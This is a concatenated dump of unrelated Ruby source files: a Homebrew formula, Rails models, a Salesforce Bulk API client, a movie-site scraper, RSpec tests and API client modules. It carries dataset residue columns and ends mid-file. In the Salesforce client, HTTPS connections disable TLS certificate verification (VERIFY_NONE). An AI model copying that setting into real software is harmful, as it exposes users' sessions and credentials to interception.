# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "ZWSProgressHUD/**/*.{h,m}"
# s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = ""
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "MBProgressHUD", "~> 0.9.2"
end
| 36.892086 | 99 | 0.595944 |
e2741040882fe5b3e6ba63a45af10d6a7908de9adb | 1,614 | class GnuTypist < Formula
  # NOTE: the hexsha/size columns fused onto the line above are
  # dataset-extraction residue, not part of the original Ruby source.
  # Homebrew formula for GNU gtypist.
  desc "GNU typing tutor"
  homepage "https://www.gnu.org/software/gtypist/"
  url "https://ftp.gnu.org/gnu/gtypist/gtypist-2.9.5.tar.xz"
  mirror "https://ftpmirror.gnu.org/gtypist/gtypist-2.9.5.tar.xz"
  sha256 "c13af40b12479f8219ffa6c66020618c0ce305ad305590fde02d2c20eb9cf977"
  revision 1
  bottle do
    sha256 "3cc13439bb4afad581022e52c5827e2cc081565bc83f2c8f47c11b21c8ad2751" => :mojave
    sha256 "79367e864781c4a9fe5b25e737e99bdcae8c7b11a2198459d72775120495c2c3" => :high_sierra
    sha256 "014e293ce1ed514fe95e6fce4cbedefdc876a51b6d38a740183b8ce959899e5a" => :sierra
    sha256 "75fcb398d3997d6d9357bb6cf5638d2e10e469ce114b344865d37112754cc7af" => :el_capitan
    sha256 "285c918d6b2240e294e6b192aff25de0f0383f9ac645d8883e04e3443e52b674" => :yosemite
  end
  depends_on "gettext"
  # Use Apple's ncurses instead of ncursesw.
  # TODO: use an IFDEF for apple and submit upstream
  patch do
    url "https://raw.githubusercontent.com/Homebrew/formula-patches/42c4b96/gnu-typist/2.9.5.patch"
    sha256 "a408ecb8be3ffdc184fe1fa94c8c2a452f72b181ce9be4f72557c992508474db"
  end
  def install
    # libiconv is not linked properly without this
    ENV.append "LDFLAGS", "-liconv" if OS.mac?
    system "./configure", "--disable-dependency-tracking",
                          "--prefix=#{prefix}",
                          "--with-lispdir=#{elisp}"
    system "make"
    system "make", "install"
  end
  test do
    # Launch a demo lesson in a child process, then terminate it — success is
    # the process starting without crashing.
    session = fork do
      exec bin/"gtypist", "-t", "-q", "-l", "DEMO_0", share/"gtypist/demo.typ"
    end
    sleep 2
    Process.kill("TERM", session)
  end
end
| 35.866667 | 99 | 0.722429 |
332df96dc3ae85ac05a6d16203fa2e6bbc449072 | 54 | class Size < ApplicationRecord
  # A size category that many dogs can belong to.
  has_many :dogs
end
| 13.5 | 30 | 0.759259 |
f81b8fad5dc2a949685b3f00fdb2e13378391d2c | 8,866 | module SalesforceBulk
  # NOTE: the hexsha/size columns fused onto the line above are
  # dataset-extraction residue, not part of the original Ruby source.
  # Interface for operating the Salesforce Bulk REST API
  # Typical usage: build a Client, call #authenticate, then use the
  # job/batch helpers defined below.
  class Client
    # The host to use for authentication. Defaults to login.salesforce.com.
    attr_accessor :login_host
    # The instance host to use for API calls. Determined from login response.
    attr_accessor :instance_host
    # The Salesforce password
    attr_accessor :password
    # The Salesforce username
    attr_accessor :username
    # The API version the client is using. Defaults to 24.0.
    attr_accessor :version
    # The ID for authenticated session
    attr_reader :session_id
def initialize(options={})
options = {:login_host => 'login.salesforce.com', :version => 24.0}.merge(options)
assert_valid_keys(options, :username, :password, :login_host, :version)
self.username = options[:username]
self.password = "#{options[:password]}"
self.login_host = options[:login_host]
self.version = options[:version]
@api_path_prefix = "/services/async/#{version}/"
@valid_operations = [:delete, :insert, :update, :upsert, :query]
@valid_concurrency_modes = ['Parallel', 'Serial']
end
def authenticate
# Clear session attributes just in case client already had a session
@session_id = nil
self.instance_host = nil
xml = '<?xml version="1.0" encoding="utf-8"?>'
xml += '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema"'
xml += ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
xml += ' xmlns:env="http://schemas.xmlsoap.org/soap/envelope/">'
xml += "<env:Body>"
xml += '<n1:login xmlns:n1="urn:partner.soap.sforce.com">'
xml += "<n1:username>#{username}</n1:username>"
xml += "<n1:password>#{password.encode(xml: :text)}</n1:password>"
xml += "</n1:login>"
xml += "</env:Body>"
xml += "</env:Envelope>\n"
response = http_post("/services/Soap/u/#{version}", xml, 'Content-Type' => 'text/xml', 'SOAPAction' => 'login')
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
result = data['Body']['loginResponse']['result']
@session_id = result['sessionId']
self.instance_host = "#{instance_id(result['serverUrl'])}.salesforce.com"
self
end
def abort_job(jobId)
xml = '<?xml version="1.0" encoding="utf-8"?>'
xml += '<jobInfo xmlns="http://www.force.com/2009/06/asyncapi/dataload">'
xml += "<state>Aborted</state>"
xml += "</jobInfo>"
response = http_post("job/#{jobId}", xml)
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Job.new_from_xml(data)
end
def add_batch(jobId, data)
body = data
if data.is_a?(Array)
raise ArgumentError, "Data set exceeds 10000 record limit by #{data.length - 10000}" if data.length > 10000
keys = data.first.keys
body = keys.to_csv
data.each do |item|
item_values = keys.map { |key| item[key] }
body += item_values.to_csv
end
end
# Despite the content for a query operation batch being plain text we
# still have to specify CSV content type per API docs.
response = http_post("job/#{jobId}/batch", body, "Content-Type" => "text/csv; charset=UTF-8")
result = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Batch.new_from_xml(result)
end
def add_job(operation, sobject, options={})
operation = operation.to_s.downcase.to_sym
raise ArgumentError.new("Invalid operation: #{operation}") unless @valid_operations.include?(operation)
assert_valid_keys(options, :external_id_field_name, :concurrency_mode)
if options[:concurrency_mode]
concurrency_mode = options[:concurrency_mode].capitalize
raise ArgumentError.new("Invalid concurrency mode: #{concurrency_mode}") unless @valid_concurrency_modes.include?(concurrency_mode)
end
xml = '<?xml version="1.0" encoding="utf-8"?>'
xml += '<jobInfo xmlns="http://www.force.com/2009/06/asyncapi/dataload">'
xml += "<operation>#{operation}</operation>"
xml += "<object>#{sobject}</object>"
xml += "<externalIdFieldName>#{options[:external_id_field_name]}</externalIdFieldName>" if options[:external_id_field_name]
xml += "<concurrencyMode>#{options[:concurrency_mode]}</concurrencyMode>" if options[:concurrency_mode]
xml += "<contentType>CSV</contentType>"
xml += "</jobInfo>"
response = http_post("job", xml)
data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Job.new_from_xml(data)
end
def batch_info_list(jobId)
response = http_get("job/#{jobId}/batch")
result = XmlSimple.xml_in(response.body, 'ForceArray' => false)
if result['batchInfo'].is_a?(Array)
result['batchInfo'].collect do |info|
Batch.new_from_xml(info)
end
else
[Batch.new_from_xml(result['batchInfo'])]
end
end
def batch_info(jobId, batchId)
response = http_get("job/#{jobId}/batch/#{batchId}")
result = XmlSimple.xml_in(response.body, 'ForceArray' => false)
Batch.new_from_xml(result)
end
def batch_result(jobId, batchId)
response = http_get("job/#{jobId}/batch/#{batchId}/result")
if ['application/xml', 'text/xml'].include? response.content_type
result = XmlSimple.xml_in(response.body)
if !result['result'].nil? && !result['result'].empty?
results = query_result(jobId, batchId, result['result'].first)
collection = QueryResultCollection.new(self, jobId, batchId, result['result'].first, result['result'])
collection.replace(results)
end
else
result = BatchResultCollection.new(jobId, batchId)
CSV.parse(response.body, :headers => true) do |row|
result << BatchResult.new(row[0], to_boolean(row[1]), to_boolean(row[2]), row[3])
end
result
end
end
# Downloads one page of query results as CSV and converts it to an
# Array of Hashes keyed by the (symbolised) CSV header row.
def query_result(job_id, batch_id, result_id)
  headers = {"Content-Type" => "text/csv; charset=UTF-8"}
  response = http_get("job/#{job_id}/batch/#{batch_id}/result/#{result_id}", headers)
  lines = response.body.lines.to_a
  # The first CSV line is the header row; the remainder are data rows.
  headers = CSV.parse_line(lines.shift).collect { |header| header.to_sym }
  result = []
  #CSV.parse(lines.join, :headers => headers, :converters => [:all, lambda{|s| to_boolean(s) if s.kind_of? String }]) do |row|
  CSV.parse(lines.join, :headers => headers) do |row|
    result << Hash[row.headers.zip(row.fields)]
  end
  result
end
# Closes a job so Salesforce stops accepting new batches for it.
#
# Returns the updated Job parsed from the XML response.
def close_job(jobId)
  xml = '<?xml version="1.0" encoding="utf-8"?>'
  xml += '<jobInfo xmlns="http://www.force.com/2009/06/asyncapi/dataload">'
  xml += "<state>Closed</state>"
  xml += "</jobInfo>"
  response = http_post("job/#{jobId}", xml)
  data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
  Job.new_from_xml(data)
end
# Fetches the current state of a job.
#
# Returns a Job parsed from the XML response.
def job_info(jobId)
  response = http_get("job/#{jobId}")
  data = XmlSimple.xml_in(response.body, 'ForceArray' => false)
  Job.new_from_xml(data)
end
# POSTs an XML body to the bulk API.
#
# When a session id is present the request goes to the instance host with
# the session header and the API path prefix; otherwise it goes to the
# login host unchanged (used for the initial login call).
#
# Returns the Net::HTTPSuccess response, or raises SalesforceError.
def http_post(path, body, headers={})
  headers = {'Content-Type' => 'application/xml'}.merge(headers)
  if @session_id
    headers['X-SFDC-Session'] = @session_id
    host = instance_host
    path = "#{@api_path_prefix}#{path}"
  else
    host = self.login_host
  end
  response = https_request(host).post(path, body, headers)
  if response.is_a?(Net::HTTPSuccess)
    response
  else
    raise SalesforceError.new(response)
  end
end
# GETs a path from the bulk API on the instance host.
#
# The API path prefix is always applied; the session header is attached
# only when a session id is present.
#
# Returns the Net::HTTPSuccess response, or raises SalesforceError.
def http_get(path, headers={})
  path = "#{@api_path_prefix}#{path}"
  headers = {'Content-Type' => 'application/xml'}.merge(headers)
  if @session_id
    headers['X-SFDC-Session'] = @session_id
  end
  response = https_request(self.instance_host).get(path, headers)
  if response.is_a?(Net::HTTPSuccess)
    response
  else
    raise SalesforceError.new(response)
  end
end
# Builds an HTTPS client for the given host on port 443.
#
# NOTE(review): VERIFY_NONE disables TLS certificate verification, which
# permits man-in-the-middle attacks — consider VERIFY_PEER unless there
# is a known reason to skip verification.
def https_request(host)
  req = Net::HTTP.new(host, 443)
  req.use_ssl = true
  req.verify_mode = OpenSSL::SSL::VERIFY_NONE
  req
end
# Extracts the instance subdomain (e.g. "na1") from a Salesforce URL.
def instance_id(url)
  match = url.match(/:\/\/([a-zA-Z0-9\-\.]{2,}).salesforce/)
  match[1]
end
private
# Raises ArgumentError when options contains a key outside valid_keys.
# Nested arrays of keys are accepted and flattened.
def assert_valid_keys(options, *valid_keys)
  allowed = valid_keys.flatten
  options.each_key do |key|
    next if allowed.include?(key)

    raise ArgumentError.new("Unknown key: #{key.inspect}. Valid keys are: #{allowed.map(&:inspect).join(', ')}")
  end
end
# Maps the strings "true"/"false" (any case, surrounding whitespace
# ignored) to real booleans; any other value — including nil — is
# returned unchanged.
def to_boolean(value)
  return value if value.nil?

  case value.strip.downcase
  when "true"  then true
  when "false" then false
  else value
  end
end
end
end
| 32.47619 | 139 | 0.627453 |
acffd113467443543c6635ec9577feb5b051294c | 1,112 | Pod::Spec.new do |s|
s.name = 'Google-Maps-iOS-SDK'
s.version = '1.1.0'
s.summary = 'Google Maps SDK for iOS.'
s.description = 'With the Google Maps SDK for iOS, you can add maps based on Google maps data to your application.'
s.homepage = 'https://developers.google.com/maps/documentation/ios/'
s.license = {
:type => 'Copyright',
:text => 'Copyright 2012 Google Inc.'
}
s.author = 'Google Inc.'
s.source = { :http => 'https://dl.google.com/geosdk/GoogleMaps-iOS-1.1.0.zip' }
s.platform = :ios
s.ios.deployment_target = '5.1'
framework_path = 'GoogleMaps-iOS-1.1.0/GoogleMaps.framework'
s.source_files = "#{framework_path}/Headers/*.h"
s.resource = "#{framework_path}/Resources/GoogleMaps.bundle"
s.preserve_paths = framework_path
s.header_dir = 'GoogleMaps'
s.frameworks = 'GoogleMaps', 'AVFoundation', 'CoreData', 'CoreLocation', 'CoreText', 'GLKit', 'ImageIO', 'OpenGLES', 'QuartzCore', 'SystemConfiguration'
s.libraries = 'icucore', 'stdc++', 'z'
s.xcconfig = { 'FRAMEWORK_SEARCH_PATHS' => '"$(PODS_ROOT)/Google-Maps-iOS-SDK/GoogleMaps-iOS-1.1.0/"' }
end
| 37.066667 | 154 | 0.677158 |
bb956d2b4fc118a540410a75b99d2245c6be5eab | 1,233 | # frozen_string_literal: true
require "simplecov"

# We start it with the rails param to ensure it includes coverage for all code
# started by the rails app, and not just the files touched by our unit tests.
# This gives us the most accurate assessment of our unit test coverage
# https://github.com/colszowka/simplecov#getting-started
SimpleCov.start("rails") do
  # We filter the tests folders, mainly to ensure that any dummy apps don't get
  # included in the coverage report. However our intent is that nothing in the
  # test folders should be included
  add_filter "/spec/"
  add_filter "/test/"

  # Our db folder contains migrations and seeding, functionality we are ok not
  # to have tests for
  add_filter "/db/"

  # Group files in the HTML report by application layer for readability.
  add_group "Forms", "app/forms"
  add_group "Helpers", "app/helpers"
  add_group "Jobs", "app/jobs"
  add_group "Lib", "app/lib"
  add_group "Mailers", "app/mailers"
  add_group "Presenters", "app/presenters"
  add_group "Services", "app/services"
  add_group "Validators", "app/validators"
  add_group "Tasks", "lib/tasks"
end

# Use test suite name to help simplecov merge minitest and rspec results
# https://github.com/simplecov-ruby/simplecov#test-suite-names
SimpleCov.command_name "test:unit:mini"
| 36.264706 | 79 | 0.746959 |
ab92512915877daa820f87838fb428da5d970c06 | 265 | #!/usr/bin/ruby
# A chick: two legs, named "Titi", chirping "Cuit cuit" — until it has
# spoken too often and falls sick.
class Poussin < Animal
  SICK_THRESHOLD = 42

  def initialize
    super(2, "Cuit cuit", "Poussin", "Titi")
  end

  # Delegates to Animal#speak while counting calls; once the threshold is
  # reached the chick gets sick and its sound changes.
  def speak
    super
    @nb_call = (@nb_call || 0) + 1
    get_sick if @nb_call >= SICK_THRESHOLD
  end

  private

  def get_sick
    @sound = "Cuo cuo"
  end
end
| 12.619048 | 44 | 0.584906 |
33ff7084e30df9f45eb6dc46846f0d940918a4f9 | 1,306 | require_relative 'active_tab'
module SharedProjectTab
  include Spinach::DSL
  include SharedActiveTab

  # Most steps simply assert the label shown by ensure_active_main_tab;
  # map each step's tab name to the label it should check.
  {
    'Home'           => 'Project',
    'Files'          => 'Files',
    'Commits'        => 'Commits',
    'Network'        => 'Network',
    'Graphs'         => 'Graphs',
    'Issues'         => 'Issues',
    'Members'        => 'Members',
    'Merge Requests' => 'Merge Requests',
    'Snippets'       => 'Snippets',
    'Wiki'           => 'Wiki'
  }.each do |tab, label|
    step "the active main tab should be #{tab}" do
      ensure_active_main_tab(label)
    end
  end

  # Settings is special-cased: it is verified through the sidebar content.
  step 'the active main tab should be Settings' do
    page.within '.nav-sidebar' do
      expect(page).to have_content('Go to project')
    end
  end

  step 'the active main tab should be Activity' do
    ensure_active_main_tab('Activity')
  end
end
| 22.912281 | 56 | 0.726646 |
38ef3176df3311b58f87e9bbd5b1b1993a680ec1 | 601 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module FirstclimbSite
  # Top-level Rails application class; Rails boots this when the app starts.
  class Application < Rails::Application
    # Initialize configuration defaults for originally generated Rails version.
    # (Opts in to all framework defaults introduced up to Rails 5.1.)
    config.load_defaults 5.1

    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration should go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded.
  end
end
| 31.631579 | 82 | 0.768719 |
ab455dedeb8089b886c26ceebbd7631752bd1a35 | 2,518 | # This code is free software; you can redistribute it and/or modify it under
# the terms of the new BSD License.
#
# Copyright (c) 2012-2017, Sebastian Staudt
# Mongoid model for a single package formula that belongs to a repository,
# tracking its versions, dependency graph and revision history.
class Formula
  include Mongoid::Document
  include Mongoid::Timestamps::Updated

  # The id is "repository_name/formula_name" (see #set_id below).
  field :_id, type: String, overwrite: true
  field :aliases, type: Array
  field :date, type: Time
  field :description, type: String
  field :devel_version, type: String
  field :head_version, type: String
  field :keg_only, type: Boolean, default: false
  field :removed, type: Boolean, default: false
  field :name, type: String
  field :homepage, type: String
  field :revision, type: Integer
  field :stable_version, type: String

  # NOTE(review): after_build is not a stock Mongoid callback — assumed to
  # be provided elsewhere in the app; confirm it fires when documents are
  # built so _id is populated.
  after_build :set_id

  # URLs use the formula name rather than the composite id.
  alias_method :to_param, :name

  belongs_to :repository, validate: false
  has_and_belongs_to_many :revisions, inverse_of: nil, validate: false, index: true
  # deps/revdeps form the two directions of the dependency graph.
  has_and_belongs_to_many :deps, class_name: self.to_s, inverse_of: :revdeps, validate: false, index: true
  has_and_belongs_to_many :revdeps, class_name: self.to_s, inverse_of: :deps, validate: false, index: true

  scope :letter, ->(letter) { where(name: /^#{letter}/) }

  index( { repository_id: 1 }, { unique: false })
  index( { name: 1 }, { unique: false })

  # Returns the most stable spec symbol available (:stable, :devel or
  # :head), or nil when the formula has no version at all.
  def best_spec
    if stable_version
      :stable
    elsif devel_version
      :devel
    elsif head_version
      :head
    else
      nil
    end
  end

  # True when a formula with the same name exists more than once
  # (i.e. in another repository).
  def dupe?
    self.class.where(name: name).size > 1
  end

  # Path of the formula file relative to its repository root.
  def path
    (repository.formula_path.nil? ? name : File.join(repository.formula_path, name)) + '.rb'
  end

  # Raw GitHub URL of the formula file at the repository HEAD.
  def raw_url
    "https://raw.github.com/#{repository.name}/HEAD/#{path}"
  end

  # Discards the cached revision list and rebuilds it from the repository.
  def generate_history!
    revisions.clear
    repository.generate_formula_history self
  end

  # Copies metadata from a formula-info hash (as produced by the scraper)
  # onto this document and resolves dependency names to Formula documents,
  # falling back to the core repository for names not found locally.
  def update_metadata(formula_info)
    self.description = formula_info['desc']
    self.homepage = formula_info['homepage']
    self.keg_only = formula_info['keg_only']
    self.stable_version = formula_info['versions']['stable']
    self.devel_version = formula_info['versions']['devel']
    self.head_version = formula_info['versions']['head']
    self.revision = formula_info['revision']
    self.deps = formula_info['dependencies'].map do |dep|
      repository.formulae.find_by(name: dep) || Repository.core.formulae.find_by(name: dep)
    end
  end

  # Preferred single version string, most stable first.
  def version
    stable_version || devel_version || head_version
  end

  # All known version strings, most stable first, nils removed.
  def versions
    [ stable_version, devel_version, head_version ].compact
  end

  # Composite primary key: "repository_name/formula_name".
  def set_id
    self._id = "#{repository.name}/#{name}"
  end
end
| 26.505263 | 106 | 0.702939 |
33f0dd6e1dca7ebc833c6deb4a81d52df2f02d1e | 1,950 | require 'fellowship'
RSpec.describe Fellowship do
  it "has a version number" do
    expect(Fellowship::VERSION).not_to be nil
  end

  it "finds the factorial of 5" do
    expect(Fellowship::Fellowship.factorial(5)).to eq(120)
  end

  it "finds the factorial of 0" do
    expect(Fellowship::Fellowship.factorial(0)).to eq(1)
  end

  it "deep copies 'hello'" do
    expect(Fellowship::Fellowship.deep_copy('hello')).to eq('hello')
  end

  it "determines whether 2 is prime" do
    expect(Fellowship::Fellowship.prime?(2)).to eq(true)
  end

  it "determines whether 3 is prime" do
    expect(Fellowship::Fellowship.prime?(3)).to eq(true)
  end

  # Description fixed: this example checks 9 (a composite), not 1.
  it "determines whether 9 is prime" do
    expect(Fellowship::Fellowship.prime?(9)).to eq(false)
  end

  it "determines whether 1.0 is prime" do
    expect(Fellowship::Fellowship.prime?(1.0)).to eq(false)
  end

  it "determines whether 2.0 is prime" do
    expect(Fellowship::Fellowship.prime?(2.0)).to eq(true)
  end

  it "determines the second digit of 2345" do
    expect(Fellowship::Fellowship.int_digit(2345,1)).to eq(3)
  end

  it "sorts people by age and name" do
    people = [
      {:name=>"Donald", :age=>8},
      {:name=>"Angela", :age=>26},
      {:name=>"Jake", :age=>34},
      {:name=>"Brett", :age=>3},
      {:name=>"Sunny", :age=>4},
      {:name=>"Stacy", :age=>54},
      {:name=>"Amber", :age=>53},
      {:name=>"Adam", :age=>54},
      {:name=>"Apsara", :age=>100},
      {:name=>"Keith", :age=>3}
    ]
    # Expected order: primary key age ascending, ties broken by name.
    sorted_people = [
      {:name=>"Brett", :age=>3},
      {:name=>"Keith", :age=>3},
      {:name=>"Sunny", :age=>4},
      {:name=>"Donald", :age=>8},
      {:name=>"Angela", :age=>26},
      {:name=>"Jake", :age=>34},
      {:name=>"Amber", :age=>53},
      {:name=>"Adam", :age=>54},
      {:name=>"Stacy", :age=>54},
      {:name=>"Apsara", :age=>100}
    ]
    expect(Fellowship::Fellowship.sort_hashes_by(people, :age, :name)).to eq(sorted_people)
  end
end
| 27.083333 | 91 | 0.592308 |
62b4074f4dd0bd3a93c078334cf7cab817e219d9 | 1,117 | module ManageIQ::Providers
module Openshift
class ContainerManager::Refresher < ManageIQ::Providers::BaseManager::Refresher
include ::EmsRefresh::Refreshers::EmsRefresherMixin
include ManageIQ::Providers::Kubernetes::ContainerManager::RefresherMixin
KUBERNETES_EMS_TYPE = ManageIQ::Providers::Kubernetes::ContainerManager.ems_type
OPENSHIFT_ENTITIES = [
{:name => 'routes'}, {:name => 'projects'},
{:name => 'build_configs'}, {:name => 'builds'}
]
def parse_legacy_inventory(ems)
kube_entities = ems.with_provider_connection(:service => KUBERNETES_EMS_TYPE) do |kubeclient|
fetch_entities(kubeclient, KUBERNETES_ENTITIES)
end
openshift_entities = ems.with_provider_connection do |openshift_client|
fetch_entities(openshift_client, OPENSHIFT_ENTITIES)
end
entities = openshift_entities.merge(kube_entities)
EmsRefresh.log_inv_debug_trace(entities, "inv_hash:")
ManageIQ::Providers::Openshift::ContainerManager::RefreshParser.ems_inv_to_hashes(entities)
end
end
end
end
| 39.892857 | 101 | 0.713518 |
878f3ec2593cdca0b212b514570337465771d438 | 759 |
module Intrigue
  module Ident
    module Check
      # Fingerprints the Wordpress "WP Fastest Cache" plugin via the HTML
      # comment the plugin injects into cached pages.
      class WordpressWpFastestCache < Intrigue::Ident::Check::Base
        def generate_checks(url)
          [
            {
              type: "fingerprint",
              category: "application",
              tags: ["Wordpress Plugin"],
              vendor: "Wordpress",
              product: "WP Fastest Cache",
              references: ["https://seclists.org/fulldisclosure/2019/Mar/17"],
              match_details: "string in body",
              match_type: :content_body,
              match_content: /<!-- WP Fastest Cache file was created in/i,
              version: nil,
              paths: ["#{url}"],
              inference: false
            }
          ]
        end
      end
    end
  end
end
| 25.3 | 79 | 0.504611 |
module Closeio
  class Client
    # CRUD helpers for Close.io Smart Views (stored by the API as
    # "saved searches").
    module SmartView
      # Returns all Smart Views.
      def list_smart_views
        get(smart_view_path)
      end

      # Fetches a single Smart View by id.
      def find_smart_view(id)
        get(smart_view_path(id))
      end

      # Creates a Smart View from the given attributes.
      def create_smart_view(options = {})
        post(smart_view_path, options)
      end

      # Updates the Smart View identified by id.
      def update_smart_view(id, options = {})
        put(smart_view_path(id), options)
      end

      # Deletes the Smart View identified by id.
      def delete_smart_view(id)
        delete(smart_view_path(id))
      end

      private

      # Builds the API path; without an id, the collection path is returned.
      def smart_view_path(id = nil)
        return 'saved_search/' unless id

        "saved_search/#{id}/"
      end
    end
  end
end
| 18.5625 | 52 | 0.597643 |
1db7d121b88c5ad9d3f4a60487bed41a002bef26 | 1,116 | # frozen_string_literal: true
# Copyright 2015-2017, the Linux Foundation, IDA, and the
# CII Best Practices badge contributors
# SPDX-License-Identifier: MIT
require 'test_helper'
load 'Rakefile'
# Golden-file test: the generated Atom feed must byte-match the stored
# fixture. Loads the schema and fixtures itself at a frozen time so the
# feed's timestamps are reproducible.
class FeedTest < ActionDispatch::IntegrationTest
  # Turn off transactional fixtures for this test since we are loading
  # the fixtures database anyway. This will prevent the timestamp change
  # from spilling into other tests.
  self.use_transactional_tests = false

  setup do
    # Ensure the test db has its environment metadata set to test,
    # otherwise tasks farther down will fail. New for Rails 5
    Rake::Task['db:environment:set'].invoke
    # Normalize time in order to match fixture file
    travel_to Time.zone.parse('2015-03-01T12:00:00') do
      ActiveRecord::Schema.verbose = false
      # Rake tasks memoize invocation; reenable so repeated runs re-execute.
      Rake::Task['db:schema:load'].reenable
      Rake::Task['db:schema:load'].invoke
      Rake::Task['db:fixtures:load'].reenable
      Rake::Task['db:fixtures:load'].invoke
    end
  end

  test 'feed matches fixture file' do
    get feed_path
    # contents() is a test helper reading the expected feed.atom fixture.
    assert_equal contents('feed.atom'), response.body
  end
end
| 31.885714 | 72 | 0.727599 |
33d959f5ce59bbf570736c90e1a23145a0bb817a | 5,301 | #coding: UTF-8
module Kinopoisk
  class Movie
    attr_accessor :id, :url, :title

    # New instance can be initialized with id(integer) or title(string). Second
    # argument may also receive a string title to make it easier to
    # differentiate Kinopoisk::Movie instances.
    #
    #   Kinopoisk::Movie.new 277537
    #   Kinopoisk::Movie.new 'Dexter'
    #
    # Initializing by title would send a search request and return first match.
    # Movie page request is made once and on the first access to a remote data.
    def initialize(input, title=nil)
      @id    = input.is_a?(String) ? find_by_title(input) : input
      @url   = "http://www.kinopoisk.ru/film/#{id}/"
      @title = title
    end

    # Returns an array of strings containing actor names
    def actors
      doc.search('#actorList ul li a').map{|n| n.text.gsub("\n",'').strip}
        .delete_if{|text| text=='...'}
    end

    # Returns a string containing title in russian
    def title
      @title ||= doc.search('.moviename-big').xpath('text()').text.strip
    end

    # Returns an integer imdb rating vote count
    def imdb_rating_count
      doc.search('div.block_2 div:eq(2)').text.gsub(/.*\(/, '').gsub(/[ ()]/, '').to_i
    end

    # Returns a float imdb rating
    def imdb_rating
      doc.search('div.block_2 div:eq(2)').text[/\d.\d\d/].to_f
    end

    # Returns an integer release year
    def year
      doc.search("table.info a[href*='/m_act%5Byear%5D/']").text.to_i
    end

    # Returns an array of strings containing countries
    def countries
      doc.search("table.info a[href*='/m_act%5Bcountry%5D/']").map(&:text)
    end

    # Returns a string containing budget for the movie
    def budget
      doc.search("//td[text()='бюджет']/following-sibling::*//a").text
    end

    # Returns a string containing Russia box-office
    def box_office_ru
      doc.search("td#div_rus_box_td2 a").text
    end

    # Returns a string containing USA box-office
    def box_office_us
      doc.search("td#div_usa_box_td2 a").text
    end

    # Returns a string containing world box-office
    def box_office_world
      doc.search("td#div_world_box_td2 a").text
    end

    # Returns a url to a small sized poster
    def poster
      doc.search(".film-img-box img[itemprop='image']").first.attr 'src'
    end

    # Returns a string containing world premiere date
    def premiere_world
      doc.search('td#div_world_prem_td2 a:first').text
    end

    # Returns a string containing Russian premiere date
    def premiere_ru
      doc.search('td#div_rus_prem_td2 a:first').text
    end

    # Returns a float kinopoisk rating
    def rating
      doc.search('span.rating_ball').text.to_f
    end

    # Returns a url to a big sized poster
    def poster_big
      poster.gsub 'iphone/iphone360_', 'big/'
    end

    # Returns an integer length of the movie in minutes
    def length
      doc.search('td#runtime').text.to_i
    end

    # Returns a string containing title in english
    def title_en
      search_by_itemprop 'alternativeHeadline'
    end

    # Returns a string containing movie description
    def description
      search_by_itemprop 'description'
    end

    # Returns an integer kinopoisk rating vote count
    def rating_count
      search_by_itemprop('ratingCount').to_i
    end

    # Returns an array of strings containing director names
    def directors
      to_array search_by_itemprop 'director'
    end

    # Returns an array of strings containing producer names
    def producers
      to_array search_by_itemprop 'producer'
    end

    # Returns an array of strings containing composer names
    def composers
      to_array search_by_itemprop 'musicBy'
    end

    # Returns an array of strings containing genres
    def genres
      to_array search_by_itemprop 'genre'
    end

    # Returns an array of strings containing writer names
    def writers
      to_array search_by_text 'сценарий'
    end

    # Returns an array of strings containing operator names
    def operators
      to_array search_by_text 'оператор'
    end

    # Returns an array of strings containing art director names
    def art_directors
      to_array search_by_text 'художник'
    end

    # Returns an array of strings containing editor names
    def editors
      to_array search_by_text 'монтаж'
    end

    # Returns a string containing movie slogan
    def slogan
      search_by_text 'слоган'
    end

    # Returns a string containing minimal age
    def minimal_age
      search_by_text('возраст').strip
    end

    # Returns a string containing duration of the film
    def duration
      search_by_text('время').strip
    end

    private

    # Fetches and memoizes the parsed movie page.
    def doc
      @doc ||= Kinopoisk.parse url
    end

    # Kinopoisk has defined first=yes param to redirect to first result
    # Return its id from location header
    def find_by_title(title)
      # FIX: URI.escape was deprecated in 2.7 and removed in Ruby 3.0;
      # encode_www_form_component is the supported stdlib way to encode a
      # query-string value (spaces become '+').
      url = SEARCH_URL + "#{URI.encode_www_form_component(title)}&first=yes"
      Kinopoisk.fetch(url).headers['Location'].to_s.match(/\/(\d*)\/$/)[1]
    end

    def search_by_itemprop(name)
      doc.search("[itemprop=#{name}]").text
    end

    def search_by_text(name)
      doc.search("//td[text()='#{name}']/following-sibling::*").text
    end

    # Splits a comma-separated name list, dropping the trailing '...'.
    def to_array(string)
      string.gsub('...', '').split(', ')
    end
  end
end
| 26.638191 | 86 | 0.661762 |
394c41b4d7ca5358d76d0d73f83932621c20dbd4 | 278 | require 'mongoid/markdown'
module ChatEngine
  # A single chat message whose body is rendered from Markdown.
  class Message
    include Mongoid::Document
    include Mongoid::Markdown

    field :from
    # FIX: a bare Time.now default is evaluated once at class-load time
